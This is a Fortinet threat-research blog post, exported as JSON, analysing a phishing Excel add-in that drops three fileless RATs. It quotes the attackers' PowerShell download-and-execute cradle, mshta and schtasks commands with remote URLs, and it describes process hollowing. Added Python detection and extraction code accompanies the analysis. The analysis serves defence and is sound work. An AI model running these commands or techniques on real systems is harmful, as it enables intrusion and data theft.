{"id":19025,"date":"2022-05-12T07:40:05","date_gmt":"2022-05-12T15:40:05","guid":{"rendered":"https:\/\/www.palada.net\/index.php\/2022\/05\/12\/news-12758\/"},"modified":"2022-05-12T07:40:05","modified_gmt":"2022-05-12T15:40:05","slug":"news-12758","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2022\/05\/12\/news-12758\/","title":{"rendered":"Phishing Campaign Delivering Three Fileless Malware: AveMariaRAT \/ BitRAT \/ PandoraHVNC \u2013 Part I"},"content":{"rendered":"<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12\">\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\"><\/div>\n<\/p><\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Fortinet\u2019s FortiGuard Labs captured a phishing campaign that was delivering three fileless malware payloads onto a victim\u2019s device. They are fileless in the sense that the final executables are decoded in memory and injected into a legitimate host process rather than ever being written to disk. Once executed, they are able to steal sensitive information from that device. <\/p>\n<p>In this analysis, I\u2019ll reveal how the phishing campaign manages to transfer the fileless malware to the victim\u2019s device, what mechanism it uses to load, deploy, and execute the fileless malware in the target process, and how it maintains persistence on the victim\u2019s device.<\/p>\n<p style=\"margin-left: 40.0px;\"><b>Affected platforms: <\/b>Microsoft Windows<br \/> <b>Impacted parties: <\/b>Microsoft Windows Users<br \/> <b>Impact:<\/b> Controls victim\u2019s device and collects sensitive information<br \/> <b>Severity level: <\/b>Critical <\/p>\n<h2>Observing the Phishing Email<\/h2>\n<p>The captured <a href=\"https:\/\/www.fortinet.com\/resources\/cyberglossary\/phishing?utm_source=blog&amp;utm_campaign=phishing\">phishing<\/a> email is shown in Figure 1.1. 
It was disguised as a notification of a payment report from a trusted source.\u00a0<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/phishing-campaign-delivering-fileless-malware\/_jcr_content\/root\/responsivegrid\/image.img.png\/1652300705505\/fig1.1..png\" alt=\"phishing email example\"\/>         <\/noscript>          <span class=\"cmp-image--title\"> Figure 1.1 \u2013 The phishing email<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>This email attempts to trick the recipient into opening the attached Excel document for the report detail. As you can see, this phishing email is detected as spam by the <a href=\"https:\/\/www.fortinet.com\/products\/email-security\/fortimail.html?utm_source=blog&amp;utm_campaign=fortimail-main-page\">FortiMail<\/a> service and has been marked as \u201c[SPAM detected by FortiMail]\u201d in the Subject line to warn the recipient.<\/p>\n<h2>Looking into the Attached Excel Document<\/h2>\n<p>The Excel document is named \u201cRemittance-Details-951244.xlam\u201d. It\u2019s an Excel Add-In (*.xlam) file that contains malicious macros. 
When the recipient opens it in Microsoft Excel, a security notice pops up asking whether to enable macros, as shown in Figure 2.1. The macro does not run until the user accepts that prompt.\u00a0<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/phishing-campaign-delivering-fileless-malware\/_jcr_content\/root\/responsivegrid\/image_898255838.img.png\/1652300758381\/fig2.1.png\" alt=\"Screenshot of the security notice that launches when opening the Excel document\"\/>         <\/noscript>          <span class=\"cmp-image--title\"> Figure 2.1 \u2013 The security notice that launches when opening the Excel document<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>It contains an auto-start macro: a VBA (Visual Basic for Applications) procedure named \u201cAuto_Open()\u201d, which Excel runs automatically as soon as the file is opened with macros enabled.<\/p>\n<p>Going through the VBA code inside the procedure, I learned that it decodes a command string and executes it through a\u00a0<a href=\"https:\/\/docs.microsoft.com\/en-us\/windows\/win32\/wmisdk\/retrieving-a-class\" target=\"_blank\">WMI<\/a> (Windows Management Instrumentation) object. Launching through WMI matters for defenders: a process created this way is spawned by the WMI provider host (WmiPrvSE.exe) rather than by Excel, so parent-child detection rules that look for Office spawning mshta.exe do not see this step.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/phishing-campaign-delivering-fileless-malware\/_jcr_content\/root\/responsivegrid\/image_728691102.img.png\/1652300879925\/fig2.2.png\" alt=\"Example of The WMI object used to execute a decoded command\"\/>         
<\/noscript>          <span class=\"cmp-image--title\"> Figure 2.2 \u2013 The WMI object used to execute a decoded command<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Figure 2.2 is a snippet of the VBA code of \u201cAuto_Open()\u201d, showing where it creates a WMI object to execute the decoded command string \u201cC:\\ProgramData\\ddond.com hxxps:\/\/taxfile[.]mediafire[.]com\/file\/6hxdxdkgeyq0z1o\/APRL27[.]htm\/file\u201d, as shown at the bottom of Figure 2.2.<\/p>\n<p>Before that, it copies the local file \u201cC:\\Windows\\System32\\mshta.exe\u201d into \u201cC:\\ProgramData\u201d under the name \u201cddond.com\u201d. \u201cmshta.exe\u201d is a Windows-native, Microsoft-signed binary designed to execute Microsoft HTML Application (HTA) files, and it accepts a URL as well as a local path. Remember that \u201cC:\\ProgramData\\ddond.com\u201d is now a byte-for-byte copy of \u201cmshta.exe\u201d, and it is this copy that is used throughout the campaign. The copy is a cheap evasion: detections (and researchers) that key on the name or path of \u201cmshta.exe\u201d see only an unknown .com file in ProgramData downloading and running the malicious HTML file, while the .com extension still makes Windows run it as an ordinary PE executable. Because the copy keeps the original file hash and version resource (OriginalFileName MSHTA.EXE), those two fields remain the reliable way to recognise it.<\/p>\n<h2>HTML + JavaScript + PowerShell<\/h2>\n<p>It downloads the \u201cAPRL27.htm\u201d file, which is parsed and executed by \u201cddond.com\u201d (i.e. \u201cmshta.exe\u201d). The HTML file contains a piece of JavaScript code that is encoded using the URL escape method (%XX sequences). 
I decoded it and simplified the code, as shown in Figure 3.1.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/phishing-campaign-delivering-fileless-malware\/_jcr_content\/root\/responsivegrid\/image_293147557.img.png\/1652300945637\/fig3.1.png\" alt=\"screenshot of The simplified JavaScript code from APRL27.html\"\/>         <\/noscript>          <span class=\"cmp-image--title\"> Figure 3.1 &#8211; The simplified JavaScript code from APRL27.html<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>It creates a \u201cWScript.Shell\u201d object using the instruction below. The string \u201cWScript.Shell\u201d does not appear in the script in clear text; it is returned by the obfuscation helper \u201c_0x5b4b3f(0x391, 0x391)\u201d, which looks strings up in an array by index, a typical output of JavaScript obfuscators.<\/p>\n<p style=\"text-align: center;\"><span style=\"background-color: rgb(189,195,199);\">chuchukukukaokiwDasidow = new ActiveXObject(_0x5b4b3f(0x391, 0x391));<\/span><\/p>\n<p>\u201cchuchukukukaokiwDasidow\u201d is the resulting OS shell object, which the script uses to run applications. 
In Figure 3.1 we can see it runs five command-line applications, as follows.<\/p>\n<ul style=\"margin-left: 40.0px;\">\n<li>powershell\u00a0 $MMMMMMM=((neW-ObjEcT ((&quot;Net.Webclient&quot;))).((&quot;Downloadstring&quot;)).invoke(((&quot;hxxps[:]\/\/taxfile[.]mediafire.com\/file\/175lr9wsa5n97x8\/mainpw.dll\/file&quot;))));Invoke-Expression $MMMMMMM<\/li>\n<li>schtasks \/create \/sc MINUTE \/mo 82 \/tn calendersw \/F \/tr &quot;&quot;&quot;%programdata%\\ddond.com &quot;&quot;&quot;&quot;&quot;&quot; hxxps[:]\/\/www[.]mediafire.com\/file\/c3zcoq7ay6nql9i\/back.htm\/file&quot;&quot;&quot;<\/li>\n<li>taskkill \/f \/im WinWord.exe<\/li>\n<li>taskkill \/f \/im Excel.exe<\/li>\n<li>taskkill \/f \/im POWERPNT.exe<\/li>\n<\/ul>\n<p>It runs PowerShell to fetch \u201cmainpw.dll\u201d with Net.WebClient.DownloadString() and hands the returned text straight to Invoke-Expression, so the script runs from memory without ever being written to disk. Despite its name, \u201cmainpw.dll\u201d is a PowerShell script, not a DLL, and the mixed-case cmdlet names and nested parentheses exist only to defeat naive string matching.<\/p>\n<p>It then runs schtasks to create a scheduled task named \u201ccalendersw\u201d in the system \u201cTask Scheduler\u201d. Every 82 minutes the task runs \u201cC:\\ProgramData\\ddond.com hxxps[:]\/\/www[.]mediafire.com\/file\/c3zcoq7ay6nql9i\/back.htm\/file\u201d, the same mshta-copy-plus-URL pattern that was used for \u201cAPRL27.htm\u201d (the \/F switch silently overwrites any existing task of that name). This is the persistence mechanism. 
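<\/p>
<p>As an added example (not code from the original post or from Fortinet), the chain described so far, from the renamed mshta.exe copy through the PowerShell download cradle to the schtasks persistence, can be turned into process-creation heuristics. The records below are constructed Sysmon-style Event ID 1 fields, not real telemetry; the field names (Image, OriginalFileName, CommandLine, ParentImage) are Sysmon\u2019s, while the rule names, the LOLBin watch-list and the user-writable path list are my own assumptions. URLs keep the page\u2019s defanged hxxps notation, which the URL regex accepts on purpose.<\/p>

```python
import ntpath
import re
from typing import Dict, List

# Constructed Sysmon-style process-creation records (Event ID 1 fields); not real telemetry.
# They model the chain described above. URLs keep the page's defanged hxxps / [.] notation.
EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE", "OriginalFileName": "Excel.exe",
     "CommandLine": r'"EXCEL.EXE" "C:\Users\user\Downloads\Remittance-Details-951244.xlam"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    # The macro started this through WMI, so its parent is the WMI provider host, not Excel.
    {"Image": r"C:\ProgramData\ddond.com", "OriginalFileName": "MSHTA.EXE",
     "CommandLine": r"C:\ProgramData\ddond.com hxxps://taxfile[.]mediafire[.]com/file/6hxdxdkgeyq0z1o/APRL27[.]htm/file",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe"},
    {"Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", "OriginalFileName": "PowerShell.EXE",
     "CommandLine": 'powershell $MMMMMMM=((neW-ObjEcT (("Net.Webclient"))).(("Downloadstring")).invoke((('
                    '"hxxps://taxfile[.]mediafire.com/file/175lr9wsa5n97x8/mainpw.dll/file"))));Invoke-Expression $MMMMMMM',
     "ParentImage": r"C:\ProgramData\ddond.com"},
    {"Image": r"C:\Windows\SysWOW64\schtasks.exe", "OriginalFileName": "schtasks.exe",
     "CommandLine": r'schtasks /create /sc MINUTE /mo 82 /tn calendersw /F /tr "%programdata%\ddond.com hxxps://www[.]mediafire.com/file/c3zcoq7ay6nql9i/back.htm/file"',
     "ParentImage": r"C:\ProgramData\ddond.com"},
    {"Image": r"C:\Windows\SysWOW64\taskkill.exe", "OriginalFileName": "taskkill.exe",
     "CommandLine": "taskkill /f /im Excel.exe", "ParentImage": r"C:\ProgramData\ddond.com"},
    # Benign controls: the genuine mshta.exe opening a local HTA, and an admin-created task.
    {"Image": r"C:\Windows\System32\mshta.exe", "OriginalFileName": "MSHTA.EXE",
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\setup.hta"', "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\schtasks.exe", "OriginalFileName": "schtasks.exe",
     "CommandLine": r'schtasks /create /sc DAILY /tn Backup /tr "C:\Program Files\Backup\run.exe"',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

URL_RE = re.compile(r"\bh(?:tt|xx)ps?://", re.I)          # also accepts the defanged hxxp(s) form
USER_WRITABLE_RE = re.compile(r"%programdata%|%appdata%|%temp%|\\ProgramData\\|\\AppData\\|\\Temp\\", re.I)
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
LOLBINS = {"mshta.exe", "rundll32.exe", "regsvr32.exe", "wscript.exe", "cscript.exe"}  # assumed watch-list
TR_RE = re.compile(r'/tr\s+("[^"]*"|\S+)', re.I)
OFFICE_KILL_RE = re.compile(r"/im\s+(winword|excel|powerpnt)\.exe", re.I)


def triage(ev: Dict[str, str]) -> List[str]:
    """Return the names of the heuristics that fire on one process-creation record."""
    hits = []
    image = ev["Image"].lower()
    base = ntpath.basename(image)
    orig = ev.get("OriginalFileName", "").lower()
    cmd = ev["CommandLine"]
    parent = ntp_base = ntpath.basename(ev["ParentImage"].lower())

    # 1. A LOLBin running under another name or outside its system directory (the ddond.com copy).
    #    The PE version resource survives a file copy, so OriginalFileName still says MSHTA.EXE.
    if orig in LOLBINS and (base != orig or ntpath.dirname(image) not in SYSTEM_DIRS):
        hits.append("renamed_lolbin")
    # 2. mshta, whatever it is called now, handed a remote URL: the "ddond.com <url>" pattern.
    if orig == "mshta.exe" and URL_RE.search(cmd):
        hits.append("mshta_remote_url")
    # 3. WMI-launched process from a user-writable directory; Excel->mshta parent rules miss this.
    if parent == "wmiprvse.exe" and USER_WRITABLE_RE.search(image):
        hits.append("wmi_spawn_user_writable")
    # 4. PowerShell download cradle; case-insensitive because the sample randomises letter case.
    if orig == "powershell.exe" and re.search(r"download(string|file|data)", cmd, re.I) \
            and re.search(r"\b(iex|invoke-expression)\b", cmd, re.I):
        hits.append("powershell_download_cradle")
    # 5. schtasks /create whose /tr action lives in a user-writable path or carries a URL.
    if base == "schtasks.exe" and re.search(r"/create\b", cmd, re.I):
        m = TR_RE.search(cmd)
        action = m.group(1) if m else ""
        if USER_WRITABLE_RE.search(action) or URL_RE.search(action):
            hits.append("schtasks_user_writable_action")
    # 6. Forced kill of Office applications.
    if base == "taskkill.exe" and OFFICE_KILL_RE.search(cmd):
        hits.append("office_taskkill")
    return hits


def triage_all(events: List[Dict[str, str]] = EVENTS) -> Dict[str, List[str]]:
    """Map each record's image basename to the heuristics it triggered (records with hits only)."""
    return {ntpath.basename(ev["Image"]): triage(ev) for ev in events if triage(ev)}


if __name__ == "__main__":
    for name, hits in triage_all().items():
        print(f"{name:16} {', '.join(hits)}")
```

<p>Note which rule catches which step: the ddond.com copy is flagged by its version resource (OriginalFileName) and by being launched by WmiPrvSE.exe from ProgramData, not by an Excel-to-mshta parent relationship, because the VBA used WMI to start it. The genuine mshta.exe opening a local HTA and the admin-created task trigger nothing.<\/p>
<p>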
Once it runs, \u201cback.htm\u201d adds more scheduled tasks.<\/p>\n<p>It also runs taskkill to forcibly terminate any running instances of MS Word (WinWord.exe), MS Excel (Excel.exe), and MS PowerPoint (POWERPNT.exe).<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/phishing-campaign-delivering-fileless-malware\/_jcr_content\/root\/responsivegrid\/image_414328273.img.png\/1652302009444\/fig3.2.png\" alt=\"APRL27.htm traffic\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 3.2 \u2013 APRL27.htm traffic<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Figure 3.2 is a screenshot of an HTTP proxy showing the requests from \u201cAPRL27.htm\u201d to \u201cmainpw.dll\u201d marked in the red box. The green box (back.htm) and blue box (Start.htm) are other groups of requests made by other \u201cddond.com\u201d commands started by the Task Scheduler.<\/p>\n<p>The \u201cmainpw.dll\u201d file (7.58 MB) is entirely PowerShell code and splits into three parts, one for each of the three fileless malware payloads. 
Figure 3.3 is a display of the simplified structure of \u201cmainpw.dll\u201d.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/phishing-campaign-delivering-fileless-malware\/_jcr_content\/root\/responsivegrid\/image_792018167.img.png\/1652301964672\/fig3.3.png\" alt=\"Outlines of the PowerShell code inside \u201cmainpw.dll\u201d\"\/>         <\/noscript>          <span class=\"cmp-image--title\"> Figure 3.3 \u2013 Outlines of the PowerShell code inside \u201cmainpw.dll\u201d<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>This code has three code segments and uses the same code logic for each malware. I\u2019ll explain how this works for each <a href=\"https:\/\/www.fortinet.com\/resources\/cyberglossary\/malware?utm_source=blog&amp;utm_campaign=malware\">malware<\/a> through their variables.<\/p>\n<ul style=\"margin-left: 40.0px;\">\n<li>The first \u201c$hexString\u201d contains a dynamic method for performing GZip decompression.<\/li>\n<li>The second \u201c$hexString\u201d contains dynamic PowerShell code that decompresses the malware payload and an inner .Net module file that deploys the malware payload.\u00a0<\/li>\n<li>The \u201c$nona\u201d is a huge byte array that contains the GZip-compressed malware payload. 
The following PowerShell code, extracted from the second $hexString, decompresses the malware payload in $nona and the inner .Net module that deploys it into two local variables.<\/li>\n<\/ul>\n<p style=\"margin-left: 80.0px;\"><span style=\"background-color: rgb(189,195,199);\">[byte[]] <span style=\"color: rgb(41,128,185);\">$RSETDYUGUIDRSTRDYUGIHOYRTSETRTYDUGIOH<\/span> = Get-DecompressedByteArray\u00a0<b><span style=\"color: rgb(192,57,43);\">$nona<\/span><\/b><\/span><\/p>\n<p style=\"margin-left: 80.0px;\"><span style=\"background-color: rgb(189,195,199);\">[byte[]] <span style=\"color: rgb(211,84,0);\">$RDSFGTFHYGUJHKGYFTDRSRDTFYGJUHKDDRTFYG<\/span> = Get-DecompressedByteArray\u00a0<b><span style=\"color: rgb(192,57,43);\">$STRDYFUGIHUYTYRTESRDYUGIRI<\/span><\/b><\/span><\/p>\n<p>At the end of each malware code segment, the code calls [Reflection.Assembly]::Load() on the byte array in \u201c$RDSFGTFHYGUJHKGYFTDRSRDTFYGJUHKDDRTFYG\u201d, which loads the inner .Net module straight from memory, so the assembly never touches disk. It then uses reflection to call the \u201cprojFUD.PA.Execute()\u201d function of that module with two parameters: the full path of a legitimate executable to be used as the host process, and the decompressed fileless malware payload. 
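<\/p>
<p>As an added example (not code from the original post), the decode steps described above can be reproduced offline to pull the stages out of a loader like \u201cmainpw.dll\u201d without running it: find each embedded blob, peel the GZip layer that Get-DecompressedByteArray would remove, and check whether the result is a PE image, which is what the Load()\/Invoke() step expects. The loader text below is constructed to mirror the layout the post describes, not the real sample; the [byte[]](n,n,...) literal form for $nona, the minimal PE stub and the helper names are assumptions.<\/p>

```python
import gzip
import re
import struct
from typing import Dict, List, Optional, Tuple

MACHINE_NAMES = {0x14C: "i386", 0x8664: "amd64"}
GZIP_MAGIC = b"\x1f\x8b"

# Regexes for two storage forms: a quoted hex string and a [byte[]](n,n,...) literal.
# The [byte[]] literal form is an assumption; the post only calls $nona a huge byte array.
HEX_RE = re.compile(r'\$(\w+)\s*=\s*["\']([0-9A-Fa-f]{64,})["\']')
ARRAY_RE = re.compile(r'\$(\w+)\s*=\s*\[byte\[\]\]\s*\(([^)]+)\)')
TARGET_RE = re.compile(r"\.Invoke\(\$null,\s*\[object\[\]\]\s*\(\s*'([^']+)'")


def build_fake_pe(machine: int, size: int = 512) -> bytes:
    """Construct a minimal PE-shaped blob for the demo: 'MZ', e_lfanew at 0x3C, 'PE\\0\\0' + COFF Machine."""
    buf = bytearray(size)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x80)
    buf[0x80:0x84] = b"PE\x00\x00"
    struct.pack_into("<H", buf, 0x84, machine)
    return bytes(buf)


# Constructed stand-in for one segment of mainpw.dll (not the real file): an uncompressed hex-string
# module, a GZip-compressed byte-array payload and the loader's Load/Invoke line from the post.
FAKE_LOADER = "\n".join([
    '$hexString = "' + build_fake_pe(0x14C).hex() + '"',
    "$nona = [byte[]](" + ",".join(str(b) for b in gzip.compress(build_fake_pe(0x14C), mtime=0)) + ")",
    "[byte[]] $payload = Get-DecompressedByteArray $nona",
    r"[Reflection.Assembly]::Load($module).GetType('projFUD.PA').GetMethod('Execute')"
    r".Invoke($null,[object[]] ( 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe', $payload))",
])


def unwrap_gzip(blob: bytes) -> Tuple[bytes, int]:
    """Peel GZip layers, as the loader's Get-DecompressedByteArray does, until plain data remains."""
    layers = 0
    while blob[:2] == GZIP_MAGIC:
        blob = gzip.decompress(blob)
        layers += 1
    return blob, layers


def pe_machine(data: bytes) -> Optional[int]:
    """Return the COFF Machine field if data carries a valid MZ/PE header pair, else None."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 6 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return None
    return struct.unpack_from("<H", data, e_lfanew + 4)[0]


def extract_stages(loader_text: str) -> List[Dict]:
    """Pull every embedded blob out of a loader script and report what it decodes to."""
    blobs = [(m.group(1), bytes.fromhex(m.group(2))) for m in HEX_RE.finditer(loader_text)]
    for m in ARRAY_RE.finditer(loader_text):
        values = (int(v, 0) for v in m.group(2).replace(" ", "").split(",") if v)
        blobs.append((m.group(1), bytes(values)))
    stages = []
    for name, raw in blobs:
        data, layers = unwrap_gzip(raw)
        machine = pe_machine(data)
        stages.append({"variable": name, "encoded_size": len(raw), "gzip_layers": layers,
                       "decoded_size": len(data), "is_pe": machine is not None,
                       "machine": MACHINE_NAMES.get(machine, machine)})
    return stages


def hollowing_targets(loader_text: str) -> List[str]:
    """Host executables handed to projFUD.PA.Execute() as its first argument."""
    return TARGET_RE.findall(loader_text)


if __name__ == "__main__":
    for stage in extract_stages(FAKE_LOADER):
        print(stage)
    print("hollowing host(s):", hollowing_targets(FAKE_LOADER))
```

<p>Running it on the real file only changes the input: read the script text and pass it to extract_stages(). Blobs that decode to a PE with Machine 0x14C are 32-bit images, which is consistent with the host path under Framework (not Framework64) and with the Wow64SetThreadContext() call in the next section.<\/p>
<p>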
Here is a piece of the PowerShell code used for the first malware.<\/p>\n<p style=\"margin-left: 80.0px;\"><span style=\"background-color: rgb(189,195,199);\">[Reflection.Assembly]::<\/span><b><span style=\"background-color: rgb(189,195,199);\">Load<\/span><\/b><span style=\"background-color: rgb(189,195,199);\">(<span style=\"color: rgb(211,84,0);\">$RDSFGTFHYGUJHKGYFTDRSRDTFYGJUHKDDRTFYG<\/span>).GetType('projFUD.PA').GetMethod('Execute').<\/span><b><span style=\"background-color: rgb(189,195,199);\">Invoke<\/span><\/b><span style=\"background-color: rgb(189,195,199);\">($null,[object[]] ( 'C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\aspnet_compiler.exe',<span style=\"color: rgb(41,128,185);\">$RSETDYUGUIDRSTRDYUGIHOYRTSETRTYDUGIOH<\/span>))<\/span><\/p>\n<p>The host chosen here, \u201caspnet_compiler.exe\u201d from the 32-bit .NET Framework 2.0 directory, is a legitimate Microsoft-signed tool, so the injected payload ends up running under a trusted process name.<\/p>\n<h2>Dynamic .Net Module for Process Hollowing<\/h2>\n<p>This is the inner .Net module that is dynamically extracted from the second $hexString variable. Its function \u201cprojFUD.PA.Execute()\u201d is called from PowerShell, where \u201cprojFUD\u201d is the namespace, \u201cPA\u201d is the class name, and \u201cExecute()\u201d is a static member function of class \u201cPA\u201d (the $null first argument to Invoke() is the null instance a static call takes). 
Figure 4.1 shows a debugger breaking at the entry of this function.\u00a0<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/phishing-campaign-delivering-fileless-malware\/_jcr_content\/root\/responsivegrid\/image_1439267125.img.png\/1652301927983\/fig4.1.png\" alt=\"Break at the entry of function \u201cprojFUD.PA.Execute()\u201d\"\/>         <\/noscript>          <span class=\"cmp-image--title\"> Figure 4.1 \u2013 Break at the entry of function \u201cprojFUD.PA.Execute()\u201d<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>From the bottom, in the \u201cLocals\u201d variable sub-tab, we see the two passed parameters. It then performs process hollowing to inject the malware payload into a newly-created process of \u201caspnet_compiler.exe\u201d.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/phishing-campaign-delivering-fileless-malware\/_jcr_content\/root\/responsivegrid\/image_847181956.img.png\/1652301891841\/fig4.2.png\" alt=\"Creating a suspended process\"\/>         <\/noscript>          <span class=\"cmp-image--title\"> Figure 4.2 \u2013 Creating a suspended process<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The \u201cExecute()\u201d function then calls the Windows API \u201cCreateProcessA()\u201d to create a process of \u201caspnet_compiler.exe\u201d with a Create 
Flag of 0x08000004 (the post prints it as 0x8000004), which is CREATE_NO_WINDOW (0x08000000) combined with CREATE_SUSPENDED (0x00000004), as shown in Figure 4.2. The new process therefore starts with no console window and with its primary thread suspended before any of its own code runs, which is the standard opening move of process hollowing.<\/p>\n<p>Next, it allocates memory inside this process and writes the malware payload into it, which takes numerous WriteProcessMemory() calls. It then overwrites the value at memory address 0x7EFDE008: in the analysis run the new process\u2019s PEB (Process Environment Block) sits at 0x7EFDE000, and offset 0x08 of the PEB holds ImageBaseAddress, so this write repoints the process\u2019s recorded image base at the copied payload. Finally it calls Wow64SetThreadContext() to update the suspended thread\u2019s context (its registers, not the registry) so that EIP (the instruction pointer) points into the copied malware payload. Wow64SetThreadContext() is the variant that sets the 32-bit (WOW64) context of a thread, which fits the host: \u201caspnet_compiler.exe\u201d from the Framework (not Framework64) directory is a 32-bit process.<\/p>\n<p>After all the above steps have been completed, it calls the API ResumeThread() and the process runs the malware payload instead of \u201caspnet_compiler.exe\u201d. Below is the decompiled code used for calling this API. \u201cprocessInformation.ThreadHandle\u201d is the handle of the primary thread of the newly created process, returned by CreateProcessA(). The call is made by late binding rather than directly: the binary string passed as the second argument decodes, 8 bits per character, to the ASCII text \u201cInvoke\u201d, and the argument list (object, member name, CallType.Method, argument array) matches Microsoft.VisualBasic\u2019s CallByName(), so \u201cPA.LX99ujNZ7X3YScj6T4\u201d calls the Invoke member of the ResumeThread delegate by name. The binary encoding keeps even the word \u201cInvoke\u201d out of the module\u2019s plain-text strings.<\/p>\n<p style=\"margin-left: 80.0px;\"><span style=\"background-color: rgb(189,195,199);\">num15\u00a0=\u00a0(int)PA.LX99ujNZ7X3YScj6T4(PA.<span style=\"color: rgb(192,57,43);\">ResumeThread<\/span>,\u00a0PA.vgxYHnXuOV51G6NIu3(&quot;010010010110111001110110011011110110101101100101&quot;),\u00a0CallType.Method,\u00a0<\/span><br \/> <span style=\"background-color: rgb(189,195,199);\">new\u00a0object[]<\/span><br \/> <span style=\"background-color: rgb(189,195,199);\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{<\/span><br \/> <span style=\"background-color: rgb(189,195,199);\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0processInformation.ThreadHandle<\/span><br \/> <span style=\"background-color: 
rgb(189,195,199);\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0});<\/span><\/p>\n<h2>Conclusion<\/h2>\n<p>In this analysis, I explained how an Excel document attached to a disguised phishing email reaches a victim\u2019s device and how the malicious macro inside it runs as soon as the recipient opens the file and enables macros.<\/p>\n<p>I also showed how the VBA code fetches a remote HTML file (APRL27.htm) through a renamed copy of \u201cmshta.exe\u201d. That file carries obfuscated JavaScript that launches the later stages. I also demonstrated how it achieves persistence by adding tasks to the system \u201cTask Scheduler\u201d so that it remains on the victim\u2019s device.<\/p>\n<p>I also explained how it obtains three fileless malware payloads from one huge downloaded PowerShell script, decompressing and loading them purely in memory to bypass file-based detection, and how each is then deployed and executed inside a legitimate target process through process hollowing. 
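<\/p>
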